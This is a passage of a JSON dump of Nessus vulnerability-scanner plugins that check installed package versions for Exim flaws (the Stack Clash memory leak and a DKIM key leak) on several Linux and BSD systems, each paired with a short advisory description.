exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"exim-4.89-5.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:56:49", "description": "It was discovered that Exim did not properly deallocate memory when processing certain command line arguments. A local attacker could use this in conjunction with another vulnerability to possibly execute arbitrary code and gain administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS : Exim vulnerability (USN-3322-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light", "p-cpe:/a:canonical:ubuntu_linux:exim4-dev", "p-cpe:/a:canonical:ubuntu_linux:eximon4", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:exim4", "p-cpe:/a:canonical:ubuntu_linux:exim4-base", "p-cpe:/a:canonical:ubuntu_linux:exim4-config"], "id": "UBUNTU_USN-3322-1.NASL", "href": "https://www.tenable.com/plugins/nessus/100920", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3322-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100920);\n script_version(\"3.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\"CVE-2017-1000369\");\n script_xref(name:\"USN\", value:\"3322-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS : Exim vulnerability (USN-3322-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was discovered that Exim did not properly deallocate memory when\nprocessing certain command line arguments. A local attacker could use\nthis in conjunction with another vulnerability to possibly execute\narbitrary code and gain administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-3322-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000369\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:eximon4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-config\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2023 Canonical, Inc. / NASL script (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release || '16.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04 / 16.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '14.04', 'pkgname': 'exim4', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '14.04', 'pkgname': 'exim4-base', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '14.04', 'pkgname': 'exim4-config', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '14.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '14.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '14.04', 'pkgname': 'exim4-dev', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '14.04', 'pkgname': 'eximon4', 'pkgver': '4.82-3ubuntu2.3'},\n {'osver': '16.04', 'pkgname': 'exim4', 'pkgver': '4.86.2-2ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'exim4-base', 'pkgver': '4.86.2-2ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'exim4-config', 'pkgver': '4.86.2-2ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.86.2-2ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.86.2-2ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'exim4-dev', 'pkgver': '4.86.2-2ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'eximon4', 'pkgver': '4.86.2-2ubuntu2.2'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'exim4 / exim4-base / exim4-config / exim4-daemon-heavy / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:56:40", "description": "Exim supports the use of multiple '-p' command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 4.80-7+deb7u5.\n\nWe recommend that you upgrade your exim4 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-26T00:00:00", "type": "nessus", "title": "Debian DLA-1001-1 : exim4 security update (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "p-cpe:/a:debian:debian_linux:exim4-base", "p-cpe:/a:debian:debian_linux:exim4-config", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg", "p-cpe:/a:debian:debian_linux:exim4-daemon-light", "p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg", "p-cpe:/a:debian:debian_linux:exim4-dbg", "p-cpe:/a:debian:debian_linux:exim4-dev", "p-cpe:/a:debian:debian_linux:eximon4", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1001.NASL", "href": "https://www.tenable.com/plugins/nessus/101032", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1001-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101032);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-1000369\");\n\n script_name(english:\"Debian DLA-1001-1 : exim4 security update (Stack Clash)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Exim supports the use of multiple '-p' command line arguments which\nare malloc()'ed and never free()'ed, used in conjunction with other\nissues allows attackers to cause arbitrary code execution.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.80-7+deb7u5.\n\nWe recommend that you upgrade your exim4 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/06/msg00030.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/exim4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eximon4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"exim4\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-base\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-config\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dbg\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dev\", reference:\"4.80-7+deb7u5\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"eximon4\", reference:\"4.80-7+deb7u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:57:34", "description": "The Exim project reports :\n\nExim leaks the private DKIM signing key to the log files.\nAdditionally, if the build option EXPERIMENTAL_DSN_INFO=yes is used, the key material is included in the bounce message.", "cvss3": {}, "published": "2016-12-27T00:00:00", "type": "nessus", "title": "FreeBSD : exim -- DKIM private key leak (e7002b26-caaa-11e6-a76a-9f7324e5534e)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:exim", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_E7002B26CAAA11E6A76A9F7324E5534E.NASL", "href": "https://www.tenable.com/plugins/nessus/96122", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96122);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-9963\");\n\n script_name(english:\"FreeBSD : exim -- DKIM private key leak (e7002b26-caaa-11e6-a76a-9f7324e5534e)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Exim project reports :\n\nExim leaks the private DKIM signing key to the log files.\nAdditionally, if the build option EXPERIMENTAL_DSN_INFO=yes is used,\nthe key material is included in the bounce message.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://exim.org/static/doc/CVE-2016-9963.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/e7002b26-caaa-11e6-a76a-9f7324e5534e.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?02b7365f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim>4.69<4.87.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T14:56:41", "description": "Qualsys reports :\n\nExim supports the use of multiple '-p' command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.", "cvss3": {}, "published": "2017-06-22T00:00:00", "type": "nessus", "title": "FreeBSD : exim -- Privilege escalation via multiple memory leaks (8c1a271d-56cf-11e7-b9fe-c13eb7bcbf4f) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:exim", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_8C1A271D56CF11E7B9FEC13EB7BCBF4F.NASL", "href": "https://www.tenable.com/plugins/nessus/100975", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100975);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-1000369\");\n\n script_name(english:\"FreeBSD : exim -- Privilege escalation via multiple memory leaks (8c1a271d-56cf-11e7-b9fe-c13eb7bcbf4f) (Stack Clash)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Qualsys reports :\n\nExim supports the use of multiple '-p' command line arguments which\nare malloc()'ed and never free()'ed, used in conjunction with other\nissues allows attackers to cause arbitrary code execution. This\naffects exim version 4.89 and earlier. Please note that at this time\nupstream has released a patch (commit\n65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a\nnew point release is available that addresses this issue at this time.\"\n );\n # https://vuxml.freebsd.org/freebsd/8c1a271d-56cf-11e7-b9fe-c13eb7bcbf4f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?50326249\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.89_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:00:57", "description": "The remote host is affected by the vulnerability described in GLSA-201709-19 (Exim: Local privilege escalation)\n\n Exim supports the use of multiple “-p” command line arguments causing a memory leak. This could lead to a stack-clash in user-space and as result the attacker can, “clash” or “smash” the stack or another memory region, or “jump” over the stack guard-page.\n Impact :\n\n A local attacker could obtain root privileges.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2017-09-25T00:00:00", "type": "nessus", "title": "GLSA-201709-19 : Exim: Local privilege escalation (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:exim", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201709-19.NASL", "href": "https://www.tenable.com/plugins/nessus/103447", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in 